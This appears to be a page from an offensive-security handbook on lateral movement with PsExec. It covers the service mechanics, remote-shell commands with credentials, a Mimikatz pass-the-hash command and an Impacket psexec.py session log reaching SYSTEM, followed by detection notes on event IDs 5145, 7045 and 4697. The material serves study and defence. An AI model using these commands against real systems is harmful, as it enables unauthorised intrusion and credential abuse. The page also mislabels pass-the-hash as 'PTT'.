PSExec

Administrator rights on the target machine are mandatory.

PSExec is part of the Sysinternals tool suite and has been reimplemented in the Impacket suite (works almost the same way). The tool is a Microsoft-signed binary, which makes it generally reliable in most Windows environments. It executes commands on a remote system by:

Connecting to shared folder ADMIN$=C:\Windows
Upload a PSEXECSVC.exe file.
Then uses the Service Control Manager (sc) to start the binary service (the SysInternals PsExec starts a service that is named PsExeSvc by default whereas Impacket’s psexec.py tool spawns a process with a randomly generated 4-characters name) as NT\SYSTEM.
Creates a named pipe on the target and uses it for I/O operations.
Runs the program under a parent process of psexecsvc.exe. The parent process of psexecsvc.exe is services.exe.
When its task is completed, the Windows PsExecSVC service will be stopped and the PSEXESVC.exe file will be deleted from ADMIN$.

In general, most defensive tool will detect (or at least have the ability to detect) lateral movement via PSExec.

psexec.exe /accepteula \\<IP> -u DOMAIN\USERNAME -p PASSWORD cmd.exe

By default, PsExec does not allow to use the Pass-The-Hash technique. However, the Mimikatz tool can be used to perform a PTT attack:

# Open a command prompt with the NTLM hash of a user using Mimikatz:
 mimikatz > sekurlsa::pth /user:<USERNAME> /domain:<DOMAIN> /ntlm:<HASH_NTLM>

# Psexec
PsExec.exe /accepteula \\<IP> cmd.exe

$ psexec.py Administrator:<PASSWORD>@10.10.0.4 -debug
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python3.9/dist-packages/impacket
[+] StringBinding ncacn_np:10.10.0.4[\pipe\svcctl]
[*] Requesting shares on 10.10.0.4.....
[*] Found writable share ADMIN$
[*] Uploading file BXtvAhde.exe
[*] Opening SVCManager on 10.10.0.4.....
[*] Creating service IcsJ on 10.10.0.4.....
[*] Starting service IcsJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1935]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

Detection

Given that psexecsvc.exe is downloaded to the target's network share (ADMIN$), It is possible to correlate events such as:

File creation
Installation of service.
Starting a process.

Logs:

Id 5145 from the Windows event log (access to the network share has been verified) will be recorded.
Id 7045 for the initial installation of the service will also be recorded.
The existence of the psexecsvc.exe file is an indication that psexec was used to gain access to the target machine.
Id 4697service created on a system.

psexec_psh, used by CobaltStrike, does not copy a binary to the target, but executes a single-line PowerShell (always 32-bit).

Reference(s)

Windows Lateral Movement with smb, psexec and alternativesnv2lt - Scratching the Surface

PreviousCode execution NextSMBExec

Last updated 2 years ago

hashtagDetection

hashtagReference(s)

Detection

Reference(s)